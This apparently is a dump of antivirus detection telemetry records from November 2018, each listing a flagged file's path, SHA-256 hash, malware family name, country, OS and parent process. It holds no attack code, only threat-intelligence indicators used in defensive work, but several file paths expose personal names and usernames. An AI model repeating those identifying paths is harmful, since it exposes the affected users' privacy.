  Row(detection=Row(filename='avscan-20181101-094741-23ee21bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094741-23EE21BB', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:47:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194503-3ec0d15d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194503-3EC0D15D', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eae2d1fa17862ce5314ac63a56f26caed9623d3e4c3f2e74d831aca72a0beb21', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\EAE2D1FA17862CE5314AC63A56F26CAED9623D3E4C3F2E74D831ACA72A0BEB21', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='eae2d1fa17862ce5314ac63a56f26caed9623d3e4c3f2e74d831aca72a0beb21', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:47:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hfbywwmd.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\HFBYWWmd.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183144-453949de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183144-453949DE', filesize=64000, name='VBA/Dldr.Agent.ukfca.#M1.#R1'), hash='e36e75dc2e68b52b64518fedb0641a32758662510897b223b1f61d7263ae0a4e', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='KE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=23040, timestamp='2018-11-01T10:33:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='idoneità fisiche.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\analisi BARTOLOZZI\\idoneità fisiche.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:18:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\adpievnvwmq\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T08:27:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='patch.exe', filepath='C:\\Program Files\\epsilon net\\Taxsystem\\patch.exe', filesize=167712000, name='TR/Dropper.Gen.#M300.#R3538'), hash='8c230a8f2554c5627b462627d43cda7418599e7b0b93b83f6e8e03975cf519cf', metadata=Row(cmdline='invagent.dll,RunUpdate', country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:40:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\scnudlrjtid\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:45:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151957-71d9c3d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151957-71D9C3D2', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:20:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aa27df03a91ef3274511dd97dabffd12c041cebe7eeea4d4132bbfe7cda92a4d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\AA27DF03A91EF3274511DD97DABFFD12C041CEBE7EEEA4D4132BBFE7CDA92A4D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='aa27df03a91ef3274511dd97dabffd12c041cebe7eeea4d4132bbfe7cda92a4d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libtcmalloc.dll', filepath='C:\\Program Files\\Garena\\Garena\\2.0.1808.1611\\libtcmalloc.dll', filesize=448000, name='W32/Ramnit.C.#M1.#R1'), hash='f0436525a43a8ddea447dc6005e768916dba3f7f362054ecd3214f1b496e65a6', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=748336, timestamp='2018-11-01T12:21:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111619-f117457f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0796b770\\AVSCAN-20181101-111437-E6F88CE5\\AVSCAN-20181101-111619-F117457F', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='ec8f0a724c5f13b2d505f03ec1b14560c8ccbf66502538b193f5c9a1896b3232', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T10:08:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libeay32.dll', filepath='C:\\Program Files\\Common Files\\TTKN\\Bin\\libeay32.dll', filesize=1216000, name='W32/Ramnit.CD.#M1.#R1'), hash='8eb80279e5e95160846621869a01d51797c9f16cd6b5fa8b30390cdcef48f6d5', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T11:59:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8ce8165e201c2d7c65f86abdff93485ff42062c7', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\8ce8165e201c2d7c65f86abdff93485ff42062c7', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='b0be44e3f6f1e5838252466506f690235c61d4e7600899f09140e3e580521f3d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\hpScannerEngineAvira\\hpScannerEngineAvira.exe', parentsize=17408, timestamp='2018-11-01T20:05:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c02b87b42fe667865584486dbbcf1d4019c4b859c9193fd4fcceb96ad3ce2b21', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\C02B87B42FE667865584486DBBCF1D4019C4B859C9193FD4FCCEB96AD3CE2B21', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c02b87b42fe667865584486dbbcf1d4019c4b859c9193fd4fcceb96ad3ce2b21', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0003607.exe', filepath='D:\\Bo PM Phong Canh\\Du Lieu Cu truoc\\Chu 4 ngo\\gho\\du lieu o D\\System Volume Information\\_restore{3EEE7538-FED8-4189-B1EA-9ED94E4594E9}\\RP12\\A0003607.exe', filesize=20992000, name='HEUR/AGEN.1006275.#M1.#R1'), hash='9adf698d3283bd72e49327542059c7dad7a59c3b2c32aa50d60d3155606b9719', metadata=Row(cmdline='-r', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 17.0.0\\avp.exe', parentsize=241544, timestamp='2018-11-01T07:59:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T17:50:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mobile.html', filepath='C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\VideoLAN\\VLC\\lua\\http\\mobile.html', filesize=20000, name='W32/Chir.B.#M1.#R1'), hash='73d0d9e1f6aaa677b125bffcf1713ac9bc4bda9b16552a89607f74c367c39c4a', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\runouce.exe', parentsize=38396, timestamp='2018-11-04T18:51:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unetbootin-windows-583.exe', filepath='F:\\unetbootin-windows-583.exe', filesize=5184000, name='W32/Virut.Gen.#M1.#R1'), hash='4db5f5cdf1312bbf01fa2f20e2b7fc0e8023100990a9b3849521001770334001', metadata=Row(cmdline='--type=renderer --no-sandbox --register-...o-sandbox --register-pepper-plugins=\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Televzr\\\\\\\\resources\\\\\\\\mpv\\\\\\\\mpvjs.node;application\\\\\\/x-mpvjs\\\\\\" --serv...32CA6C8AD898C4 --lang=ar --app-path=\\\\\\"C:\\\\\\\\Users\\\\\\\\User\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Televzr\\\\\\\\resources\\\\\\\\app.asar\\\\\\" --node-integration=true --web...latform-channel-handle=1436 \\\\\\/prefetch:1', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Televzr\\Televzr.exe', parentsize=49686728, timestamp='2018-11-04T04:25:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unwise.exe', filepath='C:\\Transtool\\Unwise.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='085055e90c76f7bcfbc46a1295c53fcb58ab0a1953ac7fe118c7261314a6d766', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T02:22:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T05:17:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024358', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024358', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:46:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131104-166fa7fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131104-166FA7FA', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='a1a8a745f4d903829ac9b7f15569d35fc1345457c5667b7b0b0b0512f80c8583', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T09:06:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-233022-7d1129d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-233022-7D1129D8', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:30:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gupropbfree v3.1.exe', filepath='C:\\Users\\X\\Downloads\\gupropbfreev3.1_24052561_fix\\GuProPBFREE v3.1.exe', filesize=1920000, name='TR/Black.Gen2.#M300.#R100338'), hash='43204df86a8293ef7b82c2c05b67b1d4ceeeacf209a5b889a950818050258adf', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T04:39:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161225-b428e788', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-161225-B428E788', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:12:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service.exe', filepath='F:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T10:35:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-175704-9a68d287', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ec0ed311\\AVSCAN-20181104-175632-9448DFBF\\AVSCAN-20181104-175704-9A68D287', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:57:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\tmp8322488\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:41:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='trz97bd.tmp', filepath='\\\\?\\C:\\Applications\\trz97BD.tmp', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T23:46:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eccyq.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\eccyq.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='01766c45d95807f53617e7b39a692d510e4dbdd220ca7aed44bd852ed782ace5', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:13:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130442-f9987193', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130442-F9987193', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:04:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:10:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T00:34:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='getdata.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.595\\getdata.exe', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='5c717e5ac52266be326d4133c6c3e42884c578c6e8e4733319fe9f138a3f78e9', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1500048, timestamp='2018-11-04T12:51:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090034-73a5747f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_396c2e7c\\AVSCAN-20181104-084957-1E887E53\\AVSCAN-20181104-090034-73A5747F', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:07:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T04:11:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:41:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:02:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='5b3b718d72399ebaec59ad04a04d767bf96c5e9016fde51295d193c32d1fb1be', metadata=Row(cmdline='-k netsvcs', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T13:46:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cae8e744aef46779873844c5a4e2e388c78494a08167ef766ad7f668a7aa7697', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\CAE8E744AEF46779873844C5A4E2E388C78494A08167EF766AD7F668A7AA7697', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='cae8e744aef46779873844c5a4e2e388c78494a08167ef766ad7f668a7aa7697', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T12:35:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T04:58:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194149-2532070c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77abea06\\AVSCAN-20181104-194023-17C93266\\AVSCAN-20181104-194149-2532070C', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:41:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zerospu2.dll', filepath='H:\\games\\takken\\Tekken5\\Pcsx2\\plugins\\ZeroSPU2.dll', filesize=388000, name='W32/Ramnit.C.#M1.#R1'), hash='656ad8da0b9ed03ad42f65e57c453052c32244e2de17d6e18b0df441cef9399c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-04T15:33:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gimp installer.exe', filepath='C:\\Users\\X\\Downloads\\Gimp Installer.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='1a54c7cfacec51ef13741b2bc01af7bd7edd66edf1e7386ec30c4c9cd48feca9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T18:36:05Z'), dt=datetime.date(2018, 11, 4)),
